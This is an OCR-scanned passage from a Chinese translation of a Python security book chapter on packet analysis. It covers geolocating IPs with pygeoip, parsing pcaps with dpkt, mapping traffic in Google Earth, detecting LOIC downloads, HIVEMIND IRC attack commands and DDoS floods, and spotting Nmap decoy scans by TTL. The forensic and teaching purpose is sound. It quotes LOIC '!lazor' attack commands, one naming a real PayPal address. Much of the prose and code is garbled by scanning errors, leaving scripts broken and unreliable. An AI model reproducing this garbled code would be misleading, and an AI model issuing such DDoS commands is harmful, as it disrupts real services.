Hi: A ARRAN RETRAIN IOUT OAISTER 
9,866,567 724K/s in 15s k 
2012-03-17 09:02:36 (664 KB/s) - 'GeoLiteCity.dat.gz" saved 
[9866567/9866567] 
analyst#gunzip GeoLiteCity.dat.gz y: 
analyst#mkdir /opt/GeoIP 
analyst#mv GeoLiteCity.dat /opt/GeoIP/Geo.dat 
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有 了 GeoLiteCity 数据 库 之 后 ， 我 们 就 可 以 把 IP 地 址 与 对 应 的 国家 、 邮 政 编码 、 国 家 名 
称 以 及 常规 经 纬度 坐标 关联 起 来 。 所 有 这 一 切 在 分 析 IP 流量 时 都 是 很 有 用 的 。 


使 用 PyGeolP 关 联 IP 地 址 和 物理 位 置 


Jennifer Ennis 编写 了 一 个 查询 GeoLiteCity 数据 库 的 纯 Python 库 ， 该 库 可 以 在 
http://code.google.com/p/pygeoip/ 位 置 下 载 ， 只 要 先 安装 ， 然 后 就 能 在 Python 脚本 中 导入 它 。 
注意 ， 我 们 先 要 用 解压 数据 库 的 路 径 实 例 化 一 个 GeoIP 类 ， 然 后 用 给 定 的 IP 地 址 查询 数据 库 
中 的 相关 记录 (record) 。 这 将 会 返回 一 个 包含 城市 (city) 、 区 域名 称 (region name) 、 邮 
政 编码 (postal code) 、 国 名 (country name) 、 经 纬度 及 其 他 识别 信息 的 记录 。 






运行 这 个 脚本 可 以 看 到 ， 它 产生 的 输出 显示 目标 IP 地 址 的 物理 位 置 是 在 美国 新 泽 西 州 泽 
西 市 ， 其 纬度 为 40.7245°*， 经 度 为 -74.0621°*。 我 们 已 经 能 把 IP 地 址 和 它 的 物理 位 置 关联 起 来 
了 ， 现 在 来 编写 我 们 的 分 析 脚 本 。 





使 用 Dpkt 解 析 包 
在 第 5 章 将 主要 使 用 Scapy， 它 能 操纵 包 中 数据 的 工具 集 来 分 析 和 生成 包 。 在 本 节 中 ， 我 


121 


Python 绝技 : 运用 Python 成 为 顶级 黑客 


们 使 用 一 个 独立 的 工具 包 Dpkt 进行 分 析 。 尽 管 Scapy 提供 了 非常 强大 的 功能 ， 但 是 菜鸟 们 却 
常常 发 现 该 工具 在 Mac OS X 和 Windows 下 的 安装 指南 非常 复杂 。 相 比 之 下 ，Dpkt 就 简单 多 
了 ， 可 以 在 http://code.google.com/p/dpkt/ 处 下 载 到 它 ， 安 装 也 很 方便 。 虽 然 两 者 功能 类 似 ， 但 
在 工具 箱 中 放 一 些 功能 类 似 的 工具 有 时 也 是 必要 的 。 在 Dug Song 创建 Dpkt 之 后 ，Jon 
Oberheide 添加 了 许多 新 的 功能 来 解析 FTP、H.225、SCTP、BPG 和 IPv6 这 些 不 同 的 协议 。 
举例 说 明 ， 假 设 我 们 已 经 抓 到 了 一 个 pcap 格式 的 网 络 抓 包 文 件 ， 想 去 分 析 它 。 

Dpkt 人 允许 逐个 分 析 抓 包 文件 里 的 各 个 数据 包 ， 并 检查 数据 包 中 的 每 个 协议 层 。 尽 管 在 这 
个 例子 中 只 用 了 一 个 事先 抓 好 的 现成 的 抓 包 文件 ， 但 你 也 可 以 很 方便 地 使 用 pypcap (E 
http://code.google.com/p/pypcap/ 处 下 载 ) 分 析 当 前 的 实时 流量 。 要 读 取 一 个 pcap 文件 ， 我 们 
先 要 创建 一 个 文件 对 象 ， 然 后 在 此 基础 上 创建 一 个 pcap.reader 类 的 对 象 ， 并 把 这 个 对 象 传递 
给 printPcap() 函 数 。 这 个 pcap 对 象 中 含有 一 个 记 有 [timestamp，packet] 记录 的 数组 。 我 们 可 以 
把 每 个 包 都 分 解 成 以 太 网 〈Ethernet) BM P 层 两 部 分 。 注 意 ， 这 里 我 们 为 了 偷懒 ， 而 使 用 了 
异常 处 理 技 术 ， 因 为 我 们 有 可 能 会 抓 到 不 含 P 层 的 第 二 层 帧 一 一 这 会 导致 代码 抛 出 一 个 异 
常 。 在 这 种 情况 下 ， 我 们 使 用 异常 处 理 ， 捕 获 该 异常 后 ， 忽 略 掉 它 继续 处 理 下 一 个 包 。 我 们 
使 用 socket 库 ， 把 存储 在 inet_ntoa 中 的 IP 地 址 转换 成 一 个 字符 串 。 最 后 ， 我 们 会 把 每 个 包 的 
源 和 目标 IP 地 址 输出 到 屏幕 上 。 

import dpkt 

import socket 

def printPcap (pcap) : 

Mi for 4ts,)\buf) (iA peap? 
I sagen Ne, arises | | 
eth = dpkt.ethernet.Ethernet (buf) 
ip = eth.data | 
src = socket.inet ntoa(ip.src) 
dst = socket.inet_ntoa(ip.dst) 
print. [+] Srec io. stot *'==> SEn | + ast 
except: | 

ja pass — 

def main ():. 

f = open('geotest.pcap') 
pcap = dpkt.pcap.Reader (f) 
printPcap (pcap) 

DES oy eee Ke Pe 

main () 

运行 脚本 ， 我 们 看 到 屏幕 上 打印 出 了 源 IP 地 址 和 目标 IP 地 址 。 尽 管 这 提供 了 一 定 程 度 的 
分 析 ， 但 还 需要 使 用 之 前 的 地 理 位 置 脚本 ， 将 其 与 物理 地 址 关联 起 来 。 
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再 改进 一 下 我 们 的 脚本 ， 添 加 一 个 名 为 retGeoStr0 的 函数 ， 该 函数 的 作用 是 返回 指定 IP 
地 址 对 应 的 物理 位 置 。 在 这 个 函数 中 ， 我 们 只 是 简单 地 解析 出 城市 和 三 个 字母 组 成 的 国家 代 
码 ， 并 把 它们 输出 到 屏幕 上 。 如 果 函 数 中 抛 出 一 个 异常 ， 就 会 返回 一 个 表明 该 地 址 无 对 应 的 
记录 信息 (unregistered) 的 消息 。 这 是 为 了 处 理 那 些 GeoLiteCity 数据 库 中 没有 记录 的 IP 地 
址 或 者 内 网 IP 地 址 (比如 该 例 中 的 192.168.1.3) 而 专门 设计 的 。 


在 我 们 的 脚本 中 添加 retGeoStr 函数 之 后 ， 我 们 现在 已 经 有 了 一 个 相当 强大 的 包 分 析 工 
具 ， 它 能 让 我 们 直接 看 到 数据 包 的 源 和 目标 物理 位 置 。 
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运行 我 们 的 脚本 可 以 看 到 ， 一 些 包 的 源 和 目标 分 别 是 韩国 、 伦 敦 、 日 本 和 澳大利亚 。 这 
使 我 们 拥有 了 一 件 强大 的 分 析 工 具 。 但 是 谷歌 地 球 还 能 在 图 形 界面 中 可 视 化 地 展示 这 些 信息 。 
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使 用 Python 画 谷歌 地 图 


谷歌 地 球 能 在 一 个 专门 的 界面 中 显示 出 一 个 虚拟 地 球 仪 、 地 图 和 地 理 信 息 。 虽 然 用 的 是 
专用 的 界面 ， 但 谷歌 地 球 可 以 让 你 很 方便 地 在 地 球 仪 上 画 出 指定 位 置 或 轨迹 。 通 过 创建 一 个 
扩展 名 为 KML 的 文本 文件 ， 用 户 可 以 把 许多 个 地 理 位 置 标 在 谷歌 地 球 上 。KML 文件 中 是 下 
面 这 种 规定 的 XML 结构 。 这 里 展示 如 何 用 名 称 和 具体 的 坐标 在 地 图 上 标 出 两 个 指定 的 位 置 。 
既然 我 们 已 经 有 了 IP 地 址 和 对 应 的 物理 位 置 的 经 纬度 ， 给 已 有 的 脚本 加 上 创建 KML 文件 的 
功能 就 很 方便 了 。 
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' po? < r Late AY r 
ad E a > > 
‘ Wal be a = e > 
Pons g s 
> i < | P E) 
EEIE ` 
j $ sále 






让 我 们 快速 写 一 个 函数 retKML(), HARGA IP, BERRIZ IP 地 址 对 应 物理 地 址 
的 KML 结构 。 请 注意 ， 我 们 首先 使 用 pygeoip 把 IP 地 址 转换 成 经 纬度 。 然 后 构建 表示 该 地 
点 的 KML 结构 。 如 果 出 现 了 异常 ， 如 “ 没 找到 对 应 的 地 点 ”， 则 返回 一 个 空 串 。 









FE 
ar 





将 该 函数 加 入 原始 脚本 ， 我 们 还 要 根据 规定 添加 所 需 的 KML 头 和 尾 。 对 每 一 个 数据 包 生 
成 表示 源 和 目标 IP 物理 地 址 的 KML 标记 ， 并 把 它们 标记 在 谷歌 地 球 仪 上 。 这 将 把 网 络 流量 
以 漂亮 的 可 视 化 形式 展现 出 来 。 想 想 根据 组 织 机 构 的 特定 需求 ， 展 示 更 多 信息 的 所 有 方法 ， 

这 会 是 非常 有 用 的 。 你 可 能 想 要 使 用 不 同 的 图 标 来 表示 不 同类 型 的 网 络 流量 ， 比 如 可 以 用 源 
和 目标 TCP 端口 (如 : 80 表示 Web, 25 表示 电子 邮件 ) 来 区 分 不 同 的 网 络 流量 。 请 查看 谷 
歌 KML 文档 (可 至 https://developers.google.com/kml/documentation/ 处 下 载 ) ， 并 根据 所 在 组 
织 机 构 可 视 化 地 展现 的 目的 ， 考 虑 所 有 能 展示 更 多 信息 的 方法 。 
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RU ASE erie) ame maip N 
a=) mainit sl dee ah 
运行 脚本 ， 我 们 把 输出 重 定 癌 到 一 个 扩展 名 为 .kml 的 文本 文件 。 用 谷歌 地 球 打 开 这 个 文 
件 可 以 看 到 ， 数 据 包 源 和 目标 地 址 都 以 图 形 化 的 形式 展现 了 出 来 。 下 一 节 将 运用 分 析 技 巧 来 
检测 黑客 团体 “匿名 者 ”发 起 的 全 球 性 的 攻击 。 


“匿名 者 ”真能 匿名 吗 ? 分 析 LOIC 流 量 


2010 年 12 月 ， 荷 兰 警 方 建 撒 了 一 名 少年 ， 他 被 控 参 与 对 Visa, MasterCard 和 Papal 进行 
了 分 布 式 拒绝 服务 攻击 ， 而 该 攻击 又 是 一 场 针对 那些 反对 维基 解密 的 公司 而 发 起 的 行动 的 一 
个 组 成 部 分 。 之 后 不 到 一 个 月 ， 美 国联 邦 调查 局 (FBI) 发 出 40 张 搜 查 令 ， 英 国 警方 又 逮捕 
5 人 。 这 些 被 指控 的 犯罪 嫌疑 人 与 “匿名 者 ”黑客 集团 保持 着 松散 联系 ， 他 们 下 载 并 使 用 一 个 
名 为 LOIC (Low Orbit Ion Cannon， 低 轨道 离子 炮 ) 的 分 布 式 拒绝 服务 工具 包 。 

LOIC 使 用 大 量 的 UDP 和 TCP 流量 对 目标 进行 拒绝 服务 式 攻 击 。 单 台 计 算 机 上 的 LOIC 
程序 只 能 消耗 目标 的 很 少 一 部 分 资源 。 但 是 ， 如 果 成 百 上 干 台 计 算 机 上 同时 使 用 LOIC， 将 很 
快 耗 尽 目标 的 资源 以 及 提供 服务 的 能 力 。 

LOIC 提供 了 两 种 操作 模式 。 在 第 一 种 模式 下 ， 用 户 可 以 输入 目标 的 地 址 。 在 第 二 种 被 称 
为 HIVEMIND (WFE) 的 模式 下 ， 用 户 将 LOIC 连接 到 一 台 IRC 服务 器 上 ， 在 这 台 服 务 器 
上 ， 用 户 可 以 提出 攻击 ， 连 接 在 这 人 台 服 务 器 上 的 IRC 的 用 户 就 会 自动 对 该 目标 进行 攻击 。 


使 用 Dpkt 友 现下 载 LOIC 的 行为 


fES fh. (Payback) 行动 中 ，“ 匿 名 者 ”组 织 的 成 员 发 布 了 一 个 文档 ， 其 中 包含 有 LOIC 
工具 包 中 常见 的 问题 答案 ， 常 见 问题 (FAQ) A: “我 使 用 它 会 不 会 被 逮捕 ? 概率 接近 于 
零 。 只 要 推 说 电脑 中 毒 了 ， 或 者 干脆 说 自己 什么 也 不 知道 ”。 本 节 将 通过 学 习 数 据 包 分 析 知 
识 编写 一 个 能 准确 证 明 他 们 是 主动 下 载 并 使 用 该 工具 包 的 工具 ， 一 一 驱 斥 这 些 度 言 。 

互联 网 上 很 多 地 方 都 有 LOIC 下 载 ， 但 有 些 下 载 源 比 另 一 些 更 可 靠 。Sourceforge 上 就 有 
一 份 〈 网 址 : http://sourceforge.net/projects/loic/) ， 我 们 从 这 里 下 载 这 个 软件 。 下 载 之 前 ， 打 
开 一 个 tepdump 会 话 ， 过 滤 出 端口 80 上 的 流量 ， 并 以 ASCII 格式 把 嗅 探 结果 打印 出 来 。 你 会 
看 到 ， 下 载 该 工具 需要 发 出 一 个 HTTP GET 请 求 ， 要 求 从 /project/loic/loic/loic-1.0.7/LOIC_ 
1.0.7.42binary.zip 中 获取 最 新 版 本 的 工具 。 
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”我们 编写 一 个 Python 脚本 来 解析 HTTP 流量 ， 并 检查 其 中 有 无 通过 HTTP GET 获取 压缩 
过 的 LOIC 二 进 制 可 执行 文件 的 情况 ， 作 为 我 们 的 LOIC 发 现 工具 包 的 第 一 部 分 。 要 做 到 这 一 
点 ， 我 们 将 再 次 使 用 Dug Song 的 Dpkt 库 。 为 了 检查 HTTP 流量 ， 我 们 必须 先 把 数据 包 的 以 
太 网 部 分 、IP 层 以 及 TCP 层 部 分 分 解 出 来 。 最 后 ， 由 于 HTTP 协议 是 位 于 TCP 协议 层 之 上 
的 。 如 果 HTTP 层 中 使 用 了 GET 方法 ， 则 解析 HTTP GET 所 要 获取 的 统一 资源 标识 符 
CURD 。 如 果 该 URI 所 指向 的 文件 的 文件 名 中 含有 .zip 和 LOIC， 则 在 屏幕 上 输出 一 条 某 个 
IP 正在 下 载 LOIC 的 消息 。 这 可 以 帮助 聪明 的 管理 员 证 明 是 用 户主 动 下 载 的 LOC 而 不 是 被 


病毒 感染 。 结 合 电子 取证 分 析 《〈 见 第 3 章 ) ， 我 们 可 以 准确 无 误 地 证 明 是 用 户 下 载 了 LOIC。 
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运行 这 个 脚本 ， 我 们 看 到 确实 有 些 用 户 下载 了 LOIC. 


解析 Hive 服 务 器 上 的 IRC 命 令 


APR LOIC 并 不 一 定 是 非法 的 (否则 本 书 作者 可 能 就 有 麻烦 了 ) 。 然 而 ， 连 接 到 “ 匿 
名 者 ”的 HIVE， 并 发 动 分 布 式 拒 绝 服 务 攻击 ， 想 要 打 瘫 某 个 服务 ， 就 违反 某 些 州 、 联 邦和 国 
家 的 法 律 了 。 由 于 “匿名 者 ”是 由 想法 相似 的 个 体 组 成 的 松散 型 团体 ， 并 非 领 导 等 级 分 明 的 
黑客 组 织 ， 任 何人 都 可 以 提出 攻击 目标 。 要 发 起 攻击 ，“ 匿 名 者 ”成 员 需 要 登录 到 指定 的 
IRC 服务 器 上 发 出 一 条 攻击 指令 ， 如 !lazor targetip=66.211.169.66 message=test test port=80 
method=tcp wait=false random=true start。 任 何 把 LOIC 以 HIVEMIND 模式 连 上 IRC 服务 器 的 
“匿名 者 ”成 员 都 能 立即 开始 攻击 该 目标 。 在 这 个 例子 中 ，IP 地 址 66.211.169.66 是 复仇 行动 
中 被 锁定 目标 的 paypal.com 的 地 址 。 

在 tcpdump 中 找到 的 特定 的 攻击 消息 流 
IRC 服务 器 发 出 一 条 开始 攻击 的 指令 。 随 后 ，IRC 服务 器 向 连 在 它 上 面 的 LOIC 客户 端 发 出 开 
始 攻击 的 指令 。 尽 管 表明 这 两 种 特定 的 包 得 看 起 来 还 是 很 方便 的 ， 但 元 长 的 PCAP 文件 中 可 
能 包含 数 小 时 甚至 数 天 的 数据 流量 ， 从 中 找 出 它 却 并 非 易 事 。 





analyst# sudo tcpdump =i ethO -A 'port 6667' | 
EWE 39:47.968991 IP anonOps.59092 > ircServer.ircd: Flags [P.], seq 
=  3112239490:3112239600, ack 110628, win 65535, opcione Bop; mops 
Na val 437994780 ecr ZARTE length 110 
' e ee ae et Oe: ~ Md ce eee 0 B86 Is ee: vd ek eee | 
ee ATOPIC 有 IC !1azor | 211. 169.66 message=test_test 
cect port=80 method=tep wait=false random=true start 
- 08:39:47.970719 IP ircServer.ircd > loic-client.59092: Flags. [P; P 
I seq 1:139, ack 110, win 453, options [nop, nop, TS val 260262 ecr 
igs aaa T FAU a | 
. E Daa y E EE A TOPIC Fiole: Ei targetip=66.211.169. A 
eh test port=80 method=tcp wait=false random=true start 


在 大 多 数 情况 下 ，IRC 服务 器 使 用 的 是 TCP 6667 HO. RE IRC 服务 器 的 消息 的 目标 
TCP w AAR 6667. M IRC 服务 器 那里 发 出 消息 的 TCP 源 端口 也 应 该 是 6667。 在 编写 
我 们 的 HIVEMIND 解析 函数 findHivemind0 时 ， 就 可 以 利用 这 一 点 。 这 次 ， 我 们 还 是 把 数据 
包 中 的 以 太 网 部 分 、IP 层 及 TCP 层 部 分 分 解 开 来 。 在 获得 TCP 层 部 分 的 数据 后 ， 我 们 检查 
它 的 源 端口 和 目标 端口 是 不 是 6667。 如 果 我 们 看 到 /iazor 指令 的 目标 端口 是 6667， 则 可 以 确 
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定 某 个 成 员 提交 了 一 个 攻击 指令 。 如 果 我 们 看 到 了 Jiazor 指令 的 源 端口 为 6667， 则 可 以 认 出 
这 是 服务 器 在 疝 HIVE 中 的 成 员 发 布 发 动 攻击 的 消息 。 





实时 检测 DDoS 攻击 


在 有 了 找 出 下 载 LOIC 的 用 户 并 找到 hive 指令 的 函数 之 后 ， 仍 有 最 后 一 个 任务 需要 我 们 
完成 : 实时 检测 出 攻击 。 当 用 户 发 起 LOC 攻击 时 ， 它 会 向 目标 发 送 大 量 的 TCP 数据 包 。 这 
些 数据 包 再 加 上 HIVE 中 其 他 客户 端 发 送 的 数据 包 ， 最 终 会 耗 尽 目 标的 所 有 资源 。 我 们 打开 
一 个 tcpdump 会 话 ， 能 够 看 到 每 0.00005s 会 发 送 一 个 很 小 的 TCP 数据 包 《〈 其 长 度 为 12B) 。 
这 一 行为 不 断 重 复 ， 直 到 攻击 终止 。 请 注意 ，( 在 下 面 给 出 的 tcpdump 监听 结果 中 ) 被 攻击 
的 目标 是 很 难 对 此 做 出 响应 的 ， 最 多 只 有 五 分 之 一 的 包 会 得 到 响应 。 
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让 我 们 快速 编写 一 个 函数 来 实时 检测 DDoS 攻击 。 若 要 识别 攻击 ， 需 要 设置 一 个 不 正常 


的 数据 包 数 量 的 阔 值 。 如 果 某 一 用 户 发 送 到 某 个 地 址 的 数据 包 的 数量 超过 了 这 个 阀 值 ， 就 表 
明 发 生 了 我 们 需要 把 它 视 为 攻击 做 进一步 调查 的 事情 。 尽 管 这 并 不 能 绝对 证 明 攻 击 是 由 用 户 
主动 发 起 的 。 但 是 ， 如 果 将 此 与 用 户主 动 下 载 LOIC， 随 后 收 到 一 条 HIVE 指令 ， 接 着 又 发 起 
攻击 等 一 系列 行为 放 在 一 起 ， 就 能 充分 证 明 用 户 参 与 了 “匿名 者 ”发 起 的 DDoS 攻击 。 
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把 我 们 的 代码 放 在 一 起 ， 再 添加 一 些 参数 解析 代码 ， 我 们 的 脚本 现在 就 能 检测 到 下 载 行 
为 ， 监 听 到 HIVE 指令 并 检查 出 攻击 行为 。 





Welly HiT 
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parser.add option('-t', dest='thresh', type="int', \ 
help='specify threshold count ') | 
(options, args) = parser.parse args() 
if options.pcapFile == None: 


/ print parser.usage 
exit (0) 
if options.thresh != None: 


THRESH = options.thresh 
peapFile = options.pcapFile 
f = open (pcapFile) 
pcap = dpkt.pcap.Reader (f) 
findDownload (pcap) 
findHivemind (pcap) 

‘ findAttack (pcap) 
if. name. == ' » main, _*: 

main() 


运行 代码 可 以 看 到 结果 。 有 四 个 用 户 下载 了 LOC 工具 包 。 接 着 ， 另 一 名 用 户 向 其 他 两 
名 连接 上 IRC 服务 器 的 用 户 发 送 了 攻击 指令 。 最 终 ， 这 两 名 攻击 者 确实 参与 了 这 次 攻击 。 因 
此 ， 这 个 脚本 确实 能 实时 地 识别 出 整个 DDoS WE. RF IDS 也 可 以 检测 出 类 似 的 活动 ， 但 
是 编写 这 类 专用 的 脚本 确实 能 够 更 好 地 呈现 出 攻击 是 如 何 进行 的 。 在 下 一 节 中 ， 我 们 将 会 看 
到 一 个 17 岁 的 年 轻 人 编写 的 专用 脚本 是 如 何 保卫 五 角 大 楼 的 。 


analyst# python findDDoS.py -p traffic.pcap 

[!] 192.168.1.3 Downloaded LOIC. 

[!] 192.168.1.5 Downloaded LOIC. 

[!] 192.168.1.7 Downloaded LOIC. 

[!] 192.168.1.9 Downloaded LOIC. 

[!] DDoS Hivemind issued by: 192.168.1.2 | 

[+] Target CMD: TOPIC #LOIC:!lazor targetip=192.168.95.141 
message=test test port=80 method=tcp wait=false random=true start 

[!] DDoS Hivemind issued to: 192.168.1.3 

[+] Target CMD: TOPIC #LOIC:!lazor targetip=192.168.95.141 
message=test test port=80 method=tcp wait=false random=true start 

[!] DDoS Hivemind issued to: 192.168.1.5 | | 

[+] Target CMD: TOPIC #LOIC:!lazor targetip=192.168.95.141 
message=test_test port=80 method=tcp wait=false random=true start 

[+] 192.168.1.3 attacked 192.168.95.141 with 1000337 pkts. 

[+] 192.168.1.5 attacked 192.168.95.141 with 4133000 pkts. 
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H.D.Moore 是 如 何 解 决 五 角 大 楼 的 麻烦 的 


1999 年 年 末 ， 美 国 五 角 大 楼 的 计算 机 网 络 面临 了 一 场 严重 危机 。 美 国 国 防 部 总 部 五 角 大 
楼 宣布 其 正在 遭受 一 系列 协调 一 致 的 老练 的 攻击 (CIO Institute bulletin on computer security, 
1999) 。 新 发 布 的 工具 一 Nmap 让 任何 人 都 能 很 容易 地 扫描 出 网 络 中 的 服务 和 漏洞 。 五 角 大 
楼 担心 袭击 者 利用 Nmap 探测 出 五 角 大 楼 大 型 计算 机 网 络 中 的 漏洞 。 

检测 出 Nmap 扫描 十 分 容易 ， 而 且 还 可 以 查 出 攻击 者 的 IP 地址， 并 依次 找 出 该 IP 的 物理 
地 址 。 但 是 ， 攻 击 者 可 以 使 用 Nmap 的 高 级 选项 。 他 们 扫描 时 在 数据 包 中 不 必 填 入 目 己 的 地 
址 ， 可 以 填 入 地 球 上 其 他 许多 不 同 地方 的 IP 地 址 进行 伪装 扫描 (decoy scan) (CIO, 1999). 
五 角 大 楼 的 专家 很 难 区 分 扫描 数据 包 是 来 自 真实 的 IP 地 址 还 是 伪造 的 IP 地 址 。 

正当 专家 们 努力 用 理论 方法 对 大 量 的 数据 记录 进行 分 析 和 研究 时 ， 来 自得 克 萨 斯 大 学 奥 
斯 汀 分 校 的 一 名 年 仅 17 岁 的 年 轻 人 却 最 终 找 到 了 解决 方案 。H.D.Moore (攻击 框架 Metasploit 
的 传奇 式 缔 造 者 ) 在 NAVY Shadow 项 目 中 见 到 了 Stephen Northcutt。 这 个 年 轻 人 建议 使 用 
TTL 字段 分 析 所 有 来 自 Nmap 扫描 的 数据 包 (Verton, 2002). IP 数据 包 的 TTL (time-to- 
live) 字段 可 以 用 来 确定 在 到 达 目 的 地 之 前 数据 包 经 过 了 几 跳 。 每 当 一 个 数据 包 经 过 一 个 路 由 
设备 时 ， 路 由 器 会 将 TTL 字段 中 的 值 减 去 一 。Moore 意识 到 这 是 个 确定 扫描 源 的 好 方法 。 对 
每 个 被 记录 为 Nmap 扫描 包 的 源 地 址 来 说 ， 他 都 会 发 送 一 个 ICMP 数据 包 ， 去 确定 源 地 址 和 
被 扫描 的 机 器 之 间隔 了 几 跳 。 然 后 他 就 运用 这 些 信息 来 辨认 真正 的 扫描 源 。 显 然 ， 只 有 来 自 
真实 的 扫描 源 的 包 中 的 TTL 正确 的 ， 伪 造 IP 的 《除非 距离 很 近 ) 包 中 的 TTL 值 则 应 该 是 不 
正确 的 。 这 个 少年 的 方法 的 确 有 效 ! Northcutt ÆR Moore 把 他 的 工具 包 和 研究 成 果 在 1999 年 
度 的 SANS 大 会 予以 发 表 (Verton, 2002). Moore 将 他 的 工具 命名 为 Nlog， 因 为 它 能 记录 
Nmap 扫描 包 中 的 许多 信息 。 

下 面 将 运用 Python 来 重新 实现 Moore 的 分 析 方 式 并 重 构 Nlog 工具 包 。 希 望 这 样 能 帮助 
你 理解 在 十 多 年 前 那个 17 岁 孩 子 搞定 的 东西 : 发 现 攻击 者 的 方式 简单 、 明 了 。 


理解 TTL 字段 


在 写 脚本 之 前 ， 我 们 解释 一 下 IP 数据 包 的 TTL 字段 。TTL 字段 由 8 比特 组 成 ， 可 以 有 效 
记录 0 至 255 之 间 的 值 。 当 计算 机 发 送 一 个 IP 数据 包 时 ， 它 将 TTL 字段 设置 为 数据 包 定 到 达 
目的 地 之 前 所 应 经 过 的 中 继 跳 的 上 限 值 。 数 据 包 每 经 过 一 个 路 由 设备 ，TTL 值 就 自 减 一 。 如 
果 TTL 值 到 了 零 ， 路 由 器 就 会 丢弃 该 数据 包 ， 以 防止 无 限 路 由 循环 。 例 如 ， 如 果 我 用 初始 
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TTL 值 为 64，ping 地 址 为 8.8.8.8， 它 返回 TTL53， 这 说 明 数 据 包 在 返回 前 经 过 了 11 个 路 由 
设备 。 





当 在 Nmap 1.60 中 引入 伪装 扫描 时 ， 伪 造 数据 包 的 TTL 值 既 不 是 随机 的 ， 也 不 是 经 过 精 
心计 算 的 。 正 因为 TTL 值 没 有 经 过 正确 计算 ，Moore 才能 够 识别 这 些 数据 包 。 显 然 ， 自 1999 
年 以 来 ，Nmap 的 代码 库 大 幅 增 长 并 且 仍 持续 更 新 。 在 目前 的 代码 中 ，Nmap 运用 以 下 算法 随 
机 化 TTL。 该 算法 为 平均 约 48 个 数据 包 生 成 一 个 随机 的 TTL 值 。 用 户 也 可 以 通过 一 个 可 选 
的 参数 把 TTL 设 为 一 个 固定 值 。 









在 以 伪装 扫描 模式 运行 Nmap 时 ， 我 们 使 用 -D 参数 后 跟 一 个 IP 地 址 。 在 下 面 这 个 例子 
中 ， 我 们 使 用 8.8.8.8 地 址 作为 伪造 地 址 。 此 外 ， 我 们 要 用 --ttl 参数 把 TTL 值 固 定 为 13。 所 以 
下 面 的 命令 就 是 : 把 TTL 值 固定 写 为 1 3， 用 假 卫 地址 8.8.8.8 扫描 192.168.1.7。 






在 目标 主机 192.168.1.7 上 ， 我 们 用 verbose 模式 (-v) 运行 tcrpdump， 禁 用 名 称 解析 (- 
nn)， 并 只 显示 出 与 地 址 8.8.8.8 相关 的 流量 Chost 8.8.8.8) 。 我 们 看 到 Nmap 成 功 地 用 假 地 址 
8.8.8.8 发 送 了 TTL (AA 13 的 伪造 数据 包 。 
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8.8.8.8.42936 > 192.168.1.7.1009: Flags [S], cksum Oxc6éfc (correct), 


seq 690560664, win 3072, options 
14:56:41.289996 IP (tos 0x0; ttl 13, 
[none], proto TCP (6), length 44) 


8:.8.8.8,42936 > 192.16641.7.1110: 


seq 690560664, win 3072, options 
14:56:41.290003 IP (tos 0x0, ttl 13, 
proto TCP (6), length 44) 


8.8.8.8.42936 > 192.168.1.7.2601: 


seq 690560664, win 3072, options 


[mss 1460], length 0 
id 16857, offset 0, flags 
Flags [S], cksum 0xc697 (correct), 
[mss 1460], length 0 


id 41154, offset 0, flags [none], 


Flags [5], cksum Oxc0c4 (correct), 
[mss 1460], length 0 


14:56:41.307069 IP (tos 0x0, ttl 13, 
proto TCP (6), length 44) 


id 63795, offset 0, flags [none], 


用 Scapy 解 析 TTL 字 段 的 值 


让 我 们 开始 编写 这 个 能 打印 出 收 到 的 数据 包 的 源 P 地 址 和 TTL 值 的 脚本 。 从 现在 起 一 直 
到 本 章 结束 ， 我 们 又 要 使 用 Scapy T. M Dpkt 编写 这 段 代 码 将 会 十 分 方便 。 我 们 要 写 一 个 函 
数 来 进行 嗅 探 ， 并 把 嗅 探 到 的 每 个 数据 包 都 传递 给 一 个 名 为 testTTLO 的 函数 ， 该 函数 将 会 检 
SBE A IP 层 ， 提 取出 源 IP 地 址 和 TTL 字段 的 值 ， 并 把 结果 输出 到 屏幕 上 。 


from scapy.all import * 
def testTTL(pkt): 
Er ' 
if pkt.haslayer (IP): 
ipsre = pkt.getlayer (IP) .src 
ttl = str (pkt.ttl) 


-print '[+] Pkt Received From: '+ipsrc+' with TTL: ' \ 


+ ttl . 
except: 
pass 
def main(): 
, sniff(prn=testTTL, store=0) 
if __name == ' main _ +， 
main () 


运行 我 们 的 代码 ， 发 现 接收 到 一 些 来 自 不 同 源 地 址 的 数据 包 ， 它 们 有 着 各 自 不 同 的 TTL 
值 。 这 些 结果 中 也 包括 来 自 8.8.8.8 的 TTL 值 为 13 的 伪装 扫描 数据 包 。 我 们 已 经 知道 ，TTL 
应 该 是 64-11=53 跳 ， 所 以 我 们 有 理由 认为 这 是 人 伪造 的 。 必 须要 注意 的 是 : Linux / UNIX 系 
统 通常 把 TTL 的 初始 值 设 为 64， 而 Windows 系统 则 把 它 设 为 128。 鉴 于 脚本 编写 的 目的 ， 这 
里 假设 扫描 我 们 的 目标 主机 需要 检查 的 IP 包 只 来 自 Linux 工作 站 。 根 据 这 一 假设 ， 我 们 来 添 
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加 一 个 函数 以 对 比 接收 到 的 TTL 和 真正 的 TTL. 


analyst# python printTTL.py 

[+] Pkt Received From: 192.168.1.7 with TTL: 64 

[+] Pkt Received From: 173.255.226.98 with TTL: 52 

[+] Pkt Received From: 8.8.8.8 with TTL: 13 

[+] Pkt Received From: 8.8.8.8 with TTL: 13 

[+] Pkt Received From: 192.168.1.7 with TTL: 64 

[+] Pkt Received From: 173.255.226.98 with TTL: 52 

[+] Pkt Received From: 8.8.8.8 with TTL: 13 

我 们 的 函数 checkTTLO 接 收 两 个 参数 : 源 IP 地 址 及 它 的 TTL 值 ， 如 果 TTL 值 不 正确 ， 
就 会 输出 一 条 消息 。 首 先 ， 我 们 用 一 个 快速 的 条 件 语句 把 使 用 内 网 /私有 P 地 址 〈10.0.0.0 一 
10.255.255.255. 172.16.0.0~172.31.255.255, VAR 192.168.0.0~192.168.255.255) 的 数据 包 全 部 
去 挥 。 要 做 到 这 一 点 ， 需 要 导入 IPy 库 。 为 了 避免 Py 库 中 的 IP 类 与 Scapy 库 中 的 IP 类 冲 
突 ， 我 们 把 它 重 新 命名 为 IPTEST 类 。 如 果 IPTESTfipsrc)j.iptype0 返 回 “PRIVATE”， 我 们 就 
让 checkTTL 函数 返回 ， 并 忽略 对 数据 包 的 检查 。 

我 们 可 能 会 收 到 来 自 同一 个 源 地 址 的 多 个 数据 包 ， 而 我 们 又 不 想 重复 检查 同一 个 源 地 
址 。 如 果 我 们 之 前 从 未 见 过 这 个 源 地 址 ， 则 要 构建 一 个 目标 IP 地 址 为 这 个 源 地 址 的 他 包 ， 这 
